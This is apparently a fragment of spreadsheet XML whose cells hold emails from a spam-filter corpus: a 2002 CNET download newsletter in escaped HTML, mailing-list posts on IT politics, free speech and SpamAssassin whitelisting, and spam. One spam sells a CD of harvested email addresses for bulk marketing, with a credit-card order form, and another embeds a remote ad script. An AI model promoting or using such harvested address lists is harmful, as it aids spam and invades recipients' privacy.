 &lt;P&gt;
 &lt;FONT size=-2&gt;in Tools &amp;amp; Editors&lt;/FONT&gt;&lt;BR&gt;
 &lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=ac-RbKtQ0UKe1dwZCldWfGJ0kSyVjyR" &gt;VB-PowerWrap 3.1&lt;/A&gt;&lt;/B&gt;&lt;BR&gt;
 Distribute Visual Basic applications the easy way with
    VB-PowerWrap. VB-PowerWrap embeds all dependent and
    non-dependent files into the executable of your VB program,
    including DLLs and OCXs, graphics, databases, and text files,
    to create a single clickable application. VB-PowerWrap scans
    a VB project, wraps the appropriate files, and creates a
    self-contained file for distribution. In addition,
    VB-PowerWrap compresses all DLLs and OCXs and registers
    appropriate controls on the user's machine if needed. It
    works with Visual Basic 4, 5, and 6.
 &lt;P&gt;
 &lt;P&gt;
 &lt;!-- top ten --&gt;
 &lt;A name=h2&gt;&lt;IMG height=19 alt="This Week's Top Ten Downloads"
 src="http://www.cnet.com/i/nl/dl/sub_top10.gif"
 width=250&gt;&lt;/A&gt;&lt;BR&gt;&lt;IMG height=8
 src="http://www.cnet.com/i/nl/rule.gif"
 width=410&gt;&lt;BR&gt;&lt;/FONT&gt;
 &lt;TABLE cellSpacing=0 cellPadding=4 width="100%" border=0&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD width="6%" height=36&gt;&lt;FONT face="arial, helvetica"
 size=-1&gt;&amp;nbsp;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD width="39%"&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;Most
 Popular Titles&lt;/B&gt;&lt;BR&gt;&lt;FONT size=-2&gt;Week ending July 14
 &lt;/FONT&gt;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD width="13%"&gt;&lt;FONT face="arial, helvetica"
 size=-1&gt;&amp;nbsp;&amp;nbsp;&lt;B&gt;Last&lt;BR&gt;&amp;nbsp;&amp;nbsp;Week&lt;/B&gt;&amp;nbsp;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD width="16%"&gt;&lt;FONT face="arial, helvetica"
 size=-1&gt;&amp;nbsp;&amp;nbsp;&lt;B&gt;Weeks&lt;BR&gt;&amp;nbsp;&amp;nbsp;on&amp;nbsp;Chart&lt;/B&gt;&amp;nbsp;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD width="26%"&gt;&lt;FONT face="arial, helvetica"
 size=-1&gt;&amp;nbsp;&amp;nbsp;&lt;B&gt;Downloads&lt;BR&gt;&amp;nbsp;&amp;nbsp;This
 Week&lt;/B&gt;&amp;nbsp;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD colSpan=5&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width="100%" border=0&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD bgColor=#cccccc&gt;&lt;IMG height=1
 src="http://www.cnet.com/b.gif"
 width=1&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR align=middle&gt;
 &lt;TD height=65&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;
 1.&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD align=left&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;
 &lt;a href="http://clickthru.online.com/Click?q=c2-oXxLQUEkRhtLmiigVnxXFZcIuInR" &gt;Microsoft
 Windows Installer (95/98/Me)&lt;/A&gt;
 &lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD width="13%"&gt;&lt;FONT face="ms sans serif, geneva" size=-2&gt;
 2&lt;/FONT&gt;&lt;/TD&gt;&lt;TD width="16%"&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;
 84&lt;/FONT&gt;&lt;/TD&gt;&lt;TD width="26%"&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;
 9,082&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt; &lt;TD colSpan=5&gt;&lt;TABLE cellSpacing=0 cellPadding=0 width="100%" border=0&gt;
 &lt;TBODY&gt;&lt;TR&gt; &lt;TD bgColor=#cccccc&gt;&lt;IMG height=1
 src="http://www.cnet.com/b.gif"
 width=1&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR align=middle&gt;
 &lt;TD height=32&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;
 2.&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD align=left&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;
 &lt;a href="http://clickthru.online.com/Click?q=d7-wk3ZQLWkDhx0kzRRmBekeVktk2eR" &gt;Microsoft
 Data Access Components RTM&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva" size=-2&gt;
 3&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva" size=-2&gt;
 84&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;
 8,901&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;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3.&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD align=left&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;
 &lt;a href="http://clickthru.online.com/Click?q=ec-MHyXQVy2Fgt9hrJ1kOqFb2GVaGyR" &gt;Java 2
 Runtime Environment, SE&lt;/A&gt;
 &lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva" size=-2&gt;
 4&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva" size=-2&gt;
 84&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva" size=-2&gt;
 8,197&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;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4.&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD align=left&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;
 &lt;a href="http://clickthru.online.com/Click?q=01-9oXDI2jHs5U1jrwvurMPGPxZ6RlR" &gt;Visual Basic
 6.0 Runtime Module SP5&lt;/A&gt;
 &lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;TD&gt;&lt;FONT face="ms sans serif, geneva" size=-2&gt;
 5&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva" size=-2&gt;
 73&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;
 7,960&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;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5.&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD align=left&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;
 &lt;a href="http://clickthru.online.com/Click?q=16-T_cjI4cFDOlw6QxDblRuaBDxRU4R" &gt;Mozilla (32-bit)
 &lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD width="13%"&gt;&lt;FONT face="ms sans serif, geneva" size=-2&gt;
 7&lt;/FONT&gt;&lt;/TD&gt;&lt;TD width="16%"&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;
 5&lt;/FONT&gt;&lt;/TD&gt;&lt;TD width="26%"&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;
 6,683&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt; &lt;TD colSpan=5&gt;&lt;TABLE cellSpacing=0 cellPadding=0 width="100%" border=0&gt;
 &lt;TBODY&gt;&lt;TR&gt; &lt;TD bgColor=#cccccc&gt;&lt;IMG height=1
 src="http://www.cnet.com/b.gif"
 width=1&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR align=middle&gt;
 &lt;TD height=32&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;
 6.&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD align=left&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;
 &lt;a href="http://clickthru.online.com/Click?q=2b-2FVYINzsUbSDIYmwzk0xBfd-8WrR" &gt;ActiveX Control Pad
 &lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva" size=-2&gt;
 6&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva" size=-2&gt;
 7&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;
 4,030&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD colSpan=5&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width="100%" border=0&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD bgColor=#cccccc&gt;&lt;IMG height=1
 src="http://www.cnet.com/b.gif"
 width=1&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR align=middle&gt;
 &lt;TD height=32&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;
 7.&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD align=left&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;
 &lt;a href="http://clickthru.online.com/Click?q=40-6Pp4Idn8VvmUmVceVXCHnpqL0wRR" &gt;UltraEdit-32&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva" size=-2&gt;
 11&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva" size=-2&gt;
 84&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;
 2,995&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD colSpan=5&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width="100%" border=0&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD bgColor=#cccccc&gt;&lt;IMG height=1
 src="http://www.cnet.com/b.gif"
 width=1&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR align=middle&gt;&lt;TD
 height=32&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;
 8.&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD align=left&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;
 &lt;a href="http://clickthru.online.com/Click?q=55-TAHaIKJ8NOR8kerqm86ccJ_2d2ZR" &gt;Borland C++ Compiler&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva" size=-2&gt;
 9&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva" size=-2&gt;
 60&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;
 2,492&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD colSpan=5&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width="100%" border=0&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD bgColor=#cccccc&gt;&lt;IMG height=1
 src="http://www.cnet.com/b.gif"
 width=1&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR align=middle&gt;&lt;TD
 height=32&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;
 9.&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD align=left&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;
 &lt;a href="http://clickthru.online.com/Click?q=6a-z_30IeWiBYcRvZqzceCGFySNP8dR" &gt;Java 2 Development Kit&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva" size=-2&gt;
 10&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva" size=-2&gt;
 84&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;
 2,177&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;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
 10.&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD align=left width="39%"&gt;&lt;FONT face="arial, helvetica"
 size=-1&gt;&lt;B&gt;
 &lt;a href="http://clickthru.online.com/Click?q=80-KTKvQQ0KYe-AT63oaDkjVsTLZ8iR" &gt;TextPad (32-bit)&lt;/A&gt;
 &lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;TD&gt;&lt;FONT face="ms sans serif, geneva" size=-2&gt;
 12&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva" size=-2&gt;
 84&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva" size=-2&gt;
 2,056&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD colSpan=5&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width="100%" border=0&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD bgColor=#cccccc&gt;&lt;IMG height=1
 src="http://www.cnet.com/b.gif"
 width=1&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/P&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;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is&amp;nbsp;qqqqqqqqqq-zdnet@spamassassin.taint.org&lt;p&gt;
 &lt;A NOTRACK HREF='http://clickthru.online.com/Click?q=95-XdTrrgdemetv9eIq14RmZWn304D_PRRR'&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@spamassassin.taint.org&amp;brand=cnet'&gt;Manage My Subscriptions&lt;/a&gt;
 &amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=aa-gBteQXUr_tVw_8rWLXZBXqONOVnR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=bf-JtRfQ8Zrg9LZaGc5w8PF_jEuwteR"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href="http://clickthru.online.com/Click?q=d4-E0SqQ0ExoPG-K0h_4Mc3148lk6yR" &gt;&lt;img src="http://www.cnet.com/i/dp/smrb.gif" width="37" height="37" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=e9-gdzpQxVzwRjdLmhTRnU3P83P5XlR" &gt;&lt;font color="#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=fe-xkIgQwgwkwdtBugeE4rbg6amtI4R" &gt;&lt;font color="#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=13-NxSZI3XW8Y4CAu0ssDLfzpHOCerR" &gt;&lt;font color="#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=29-Sg_rIjMAh2mMeIeNyGEI9rCM8vlR" &gt;&lt;font color="#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=3e-F51nIizXmEt5xI2_7DQESNPe-i4R"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src="http://gserv-cnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136482&amp;NL=e416&amp;ISSUE=2002-07-17" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=53-n8CdnHnCBiH0XpcYx-pQ_Iwsz9RR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Photoshop the worlds ugliest truck
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8274140,1717/
 Date: 2002-09-26T12:27:22+01:00
 (Some Ugly Guy)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: SunMSapple meta4 of the day
</t>
  </si>
  <si>
    <t xml:space="preserve">Clearly, it is US/NATO = Sun/IBM/OSS, USSR = MS
 "Where we want you to go in our 5 year plan?"
 sdw
 Tom wrote:
 &gt;Im feeling a bit farklempt having spent the night at Todais with the
 &gt;family so talk amongst yourself..here Ill give you a topic
 &gt;
 &gt;The current state of IT can be thought of in terms of the Cold war with
 &gt;the US and the UUSR being MS and Sun/IBM/OSS (does it matter which side
 &gt;is which?), Apple as Cuba and the US legal system as the UN.
 &gt;
 &gt;Discuss.
 &gt;  
 &gt;
 -- 
 sdw@lig.net http://sdw.st
 Stephen D. Williams 43392 Wayside Cir,Ashburn,VA 20147-4622
 703-724-0118W 703-995-0407Fax Dec2001
</t>
  </si>
  <si>
    <t xml:space="preserve">Heh, ten years ago saying the exact same words was most definitely not 
 "parroting the party line".
 It was even less so thirty years ago. My story remains the same, take it 
 or leave it. I've said the same words to white supremacists as to 
 suburban leftist punks as to homeys as to French Irish, etc. etc.:
 I don't have to agree with anything you say. I *am* obligated to defend 
 to the death your right to say it. I don't give a rat's ass where you 
 say it, even in France. I don't care where the political pendulum has 
 swung currently.
 Chuck
 On Tuesday, September 17, 2002, at 10:38 AM, Owen Byrne wrote:
 &gt; On Tue, Sep 17, 2002 at 10:19:13AM -0700, Chuck Murcko wrote:
 &gt;&gt; Probably because we have this pesky 1st Amendment thing here. Still,
 &gt;&gt; lots of us in the States have developed a disturbing tendency to shout
 &gt;&gt; down or (in recent years) shackle in legal BS opinions, thoughts, and
 &gt;&gt; individual behaviors we don't agree with.
 &gt;&gt;
 &gt;
 &gt; Except that parroting the party line doesn't really require much
 &gt; freedom of speech. Now if you had posted something from a left of
 &gt; center source, you would have been shouted down in flames, buried in
 &gt; ad hominem attacks, and probably get your name added to an FBI list.
 &gt;
 &gt;
 &gt; Besides the basic rule in the United States now is "I'll defend your
 &gt; rights to say anything you want, but if it isn't appropriately
 &gt; neoconish, well, don't expect to work":
 &gt;
 &gt;
 &gt; HHS Seeks Science Advice to Match Bush Views
 &gt;
 &gt; By Rick Weiss
 &gt; Washington Post Staff Writer
 &gt; Tuesday, September 17, 2002; Page A01
 &gt;
 &gt; The Bush administration has begun a broad restructuring of the
 &gt; scientific advisory committees that guide federal policy in areas such
 &gt; as patients' rights and public health, eliminating some committees
 &gt; that were coming to conclusions at odds with the president's views and
 &gt; in other cases replacing members with handpicked choices.
 &gt; ...
 &gt; http://www.washingtonpost.com/wp-dyn/articles/A26554-2002Sep16.html
 &gt;
 &gt; Owen
 &gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SAtalk] Some Stupid Questions
</t>
  </si>
  <si>
    <t xml:space="preserve">As the subject line indicates, I'm sure these are stupid questions, but
 I'm having trouble getting SA working like I understand it should work,
 and have about given up on trying to figure it out myself.
 If a user has a line like:
 whitelist_from *@yahoogroups.com
 in his .spamassassin/user_prefs file, does that line not, in effect,
 tell the program to take no action at all against any mail coming in from
 yahoogroups.com, or is there still checking being done against it?  And if
 the latter, what does he need to place in user_prefs to cause such mail
 to be ignored?  I'm testing SA here with a few users who happen to be on
 yahoogroups lists, before deploying it system-wide, and although the above
 line has been added to their user_prefs files, much of their list mail is
 still going to the spam folder due to all the usual things you would
 expect to trigger SA.
 Thanks in advance for any help.
 --
 Ken Scott,
 admin@shellworld.net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</si>
  <si>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EMAIL LIST - 100 MILLION ADDRESSES $79
</t>
  </si>
  <si>
    <t xml:space="preserve">Jane,
 Here is the information you requested
 YOUR EMAIL ADDRESS: webmaster@efi.ie
 TARGETED EMAIL ADDRESS CD-ROM
 100 MILLION + ADDRESSES
 MORE THAN 34 CATEGORIES SUCH AS:
 = Multi level Marketers
 = Opportunity Seekers 
 = Telephone Area code
 = Country, City, State, etc..
 = People running home businesses or interested in home businesses.
 = Travel &amp; Vacations
 = Opt-in
 = People interested in Investments
 = People or businesses who spent more than $1000 on the web in thelast 2 months
 AND  MANY MORE
 * Contains US &amp; International EMAILS
 * Everything on this disk is in TEXT file format and fully exportable.
 * The CD is as easy to use as browsing your C drive in Explorer.
 HOW THIS AMAZING DIRECTORY WAS COMPILED:
 * Virtually every other email directory on the Internet was taken and put it through an extensive email verification process thus eliminating all the dead addressess.
 * Special software spiders through the web searching websites, newsgroups and many other online databases with given keywords like area codes, industries, city names etc.. to find millions of fresh new addresses every week.
 This month only $79 (Regular price $199)
 DO NOT SEND A REPLY TO THIS EMAIL ADDRESS. TO PLACE AN ORDER, READ INSTRUCTIONS BELOW:
 TO ORDER BY CREDIT CARD (VISA, MASTERCARD OR AMERICAN EXPRESS)
 - Simply complete the order form below and fax it back to ( 44 3 )  65  9 - 0 73 0 
 Make sure that we have your email address so that we can send you a reciept for your transaction.
 TO ORDER BY MAIL:
 Print the form below and send it together with a money order payable to FT International for the balance to:
 5863 Le s lie St.
 Suite 408
 T oronto, Ont a rio
 CANADA
 OR D E R  F OR M :
 Please PRINT clearly
 Full Name:________________________________________________
 Company Name:_____________________________________________
 Telephone:________________________________________________
 Fax:______________________________________________________
 Email Address:__________________________________________* REQUIRED FIELD
 Shipping Address:______________________________________________
 City:____________________ State/Province:________________
 Country:_________________________ZIP/Postal:_____________
 Shipping Options: []  $5 Regular Mail (1 - 2 weeks)   []  $12 Priority Mail (2-4 business days)    []  $25 Fedex (overnight)
 $79.00 USD + Shipping Charge $________ US   = TOTAL:  $_________ USD
 ======================================================================================
 [] Credit Card Order    [] Mail Order
 CREDIT CARD ORDERS FAX THIS ORDER FORM BACK TO 1 - 44 3 - 6 59 - 07 3 0)
 Card #:___________________________________________________
 Expiry Date: ______________ 
 Type of Card [] VISA  [] MASTERCARD  [] AMERICAN EXPRESS
 Name on Card:_____________________________________________
 Billing Address:_________________________________ZIP/Postal: ____________
 City:_____________________State/Province:_______________ Country:_____________
 Cardholder Signature:______________________________________
 Please note that FT  I n t e rn a ti  o n al will appear on your statement.
 =======================================================================================
 For any questions please feel free to call us at 1 - 4 1 6 - 2 3 6 - 89 8 1
 To be removed from our database please send an email to ftremovals32663_372@yahoo.com 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Your Genealogy
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;div align="center"&gt;&lt;center&gt;
 &lt;table border="0" width="100%"&gt;
   &lt;tr&gt;
     &lt;td width="34%"&gt;&lt;a href="http://www.rootssearch.net"&gt;
     &lt;img
     src="http://www.rootssearch.net/rssmall.gif" alt="rssmall.gif (5170 bytes)" border="0" width="246" height="60"&gt;&lt;/a&gt;&lt;/td&gt;
     &lt;td width="66%"&gt;&lt;p align="right"&gt;&lt;script LANGUAGE="javascript"
     src="http://www.qksz.net/1e-2spy"&gt; &lt;/script&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/center&gt;&lt;/div&gt;&lt;div align="center"&gt;&lt;center&gt;
 &lt;table border="0" width="99%" cellspacing="0" bgcolor="#800000"&gt;
   &lt;tr&gt;
     &lt;td width="100%"&gt;&lt;div align="center"&gt;&lt;center&gt;&lt;table border="0" width="100%"
     cellpadding="2" cellspacing="0"&gt;
       &lt;tr&gt;
         &lt;td width="50%" bgcolor="#F8F8F1"&gt;&lt;p align="left"&gt;&lt;font face="Arial" color="#800000"&gt;&lt;small&gt;&lt;a
         href="http://www.rootssearch.net/index.html"&gt;RootsSearch.net&lt;/a&gt;: &lt;/small&gt;&lt;/font&gt;
         &lt;font face="Arial" style="font-size: smaller" color="#800000"&gt;Online 
         Auction&lt;/font&gt;&lt;/td&gt;
         &lt;td width="50%" bgcolor="#F8F8F1"&gt;&lt;small&gt;&lt;font face="Arial" color="#800000"&gt;&lt;p
         align="right"&gt;&lt;/font&gt;&lt;font face="Arial"&gt;&lt;strong&gt;&lt;small&gt;&lt;a
         href="http://www.rootssearch.net"&gt;
         &lt;img src="http://www.rootssearch.net/home.gif"
         alt="GO TO ROOTSSEARCH.NET'S HOME PAGE" border="0" width="18" height="16"&gt;&lt;/a&gt; &lt;a
         href="http://rootssearch.mail.everyone.net"&gt;
         &lt;img
         src="http://www.rootssearch.net/checkemail.gif"
         alt="CHECK YOUR MAIL HERE OR SIGN UP IF YOU DON'T HAVE YOUR-FAMILY@ROOTSSEARCH.NET EMAIL"
         border="0" width="17" height="15"&gt;&lt;/a&gt; &lt;a href="http://www.rootssearch.net/cgi-bin/dclinks/dclinks.cgi"&gt;
         &lt;img
         src="http://www.rootssearch.net/downloads.gif"
         alt="DOWNLOAD FREE OR SHAREWARE GENEALOGY SOFTWARE" border="0" width="18" height="15"&gt;&lt;/a&gt; &lt;/small&gt;&lt;/strong&gt;&lt;small&gt;&lt;small&gt;&lt;strong&gt;
         &lt;a href="http://www.rootssearch.net/cgi-bin/auction/ezauct.pl"&gt;
         &lt;img border="0" src="http://www.rootssearch.net/bid.gif" width="16" height="16"&gt;&lt;/a&gt;&lt;/strong&gt;&lt;/small&gt;&lt;/small&gt;&lt;/small&gt;
         &lt;a href="http://www.rootssearch.net/freepages.html"&gt;
         &lt;img
         src="http://www.rootssearch.net/createapage.gif" alt="createapage.gif (913 bytes)"
         border="0" width="17" height="16"&gt;&lt;/a&gt;&lt;strong&gt;&lt;small&gt;&lt;small&gt; &lt;a
         href="http://www.rootssearch.net/cgi-bin/birdcast/birdcast.cgi"&gt;
         &lt;img
         src="http://www.rootssearch.net/TellAFriend.gif" alt="TELL A FRIEND ABOUT ROOTSSEARCH.NET"
         border="0" width="20" height="16"&gt;&lt;/a&gt;&lt;/small&gt;&lt;/small&gt;&lt;/strong&gt;&lt;/font&gt;&lt;/td&gt;
       &lt;/tr&gt;
     &lt;/table&gt;
     &lt;/center&gt;&lt;/div&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/center&gt;&lt;/div&gt;&lt;div align="center"&gt;&lt;center&gt;
 &lt;table border="0" width="100%"&gt;
   &lt;tr&gt;
     &lt;td width="78%" valign="top"&gt;&lt;div align="center"&gt;&lt;center&gt;&lt;table border="0" width="100%"
     cellspacing="0" bgcolor="#800000"&gt;
       &lt;tr&gt;
         &lt;td width="100%"&gt;&lt;p align="center"&gt;&lt;font face="Verdana" color="#FFFFFF"&gt;&lt;small&gt;&lt;a
         STYLE="color:#FFFFFF" href="http://rootssearch.mail.everyone.net"&gt;Check Mail&lt;/a&gt; | &lt;a
         STYLE="color:#FFFFFF" href="http://www.rootssearch.net/rsearch/"&gt;Gen Directory&lt;/a&gt; | &lt;a
         STYLE="color:#FFFFFF" href="http://www.rootssearch.net/services.html"&gt;My Services&lt;/a&gt; | &lt;a
         STYLE="color:#FFFFFF" href="http://www.rootssearch.net/cgi-bin/dcforum/dcboard.cgi"&gt;Query
         Forums&lt;/a&gt; | &lt;a STYLE="color:#FFFFFF"
         href="http://www.rootssearch.net/cgi-bin/dclinks/dclinks.cgi"&gt;Downloads&lt;/a&gt; | &lt;a
         STYLE="color:#FFFFFF" href="http://rootssearch.vstorelibrary.com"&gt;Book Store&lt;/a&gt; | &lt;a
         STYLE="color:#FFFFFF" href="http://www.rootssearch.net/shopping.html"&gt;Resources&lt;/a&gt; | &lt;a
         STYLE="color:#FFFFFF" href="http://www.rootssearch.net/articles/"&gt;Articles&lt;/a&gt;&lt;/small&gt;&lt;/font&gt;&lt;/td&gt;
       &lt;/tr&gt;
     &lt;/table&gt;
     &lt;/center&gt;&lt;/div&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/center&gt;&lt;/div&gt;&lt;div align="center"&gt;&lt;center&gt;
 &lt;table border="0" width="100%"&gt;
   &lt;tr&gt;
     &lt;td width="62%" valign="bottom"&gt;
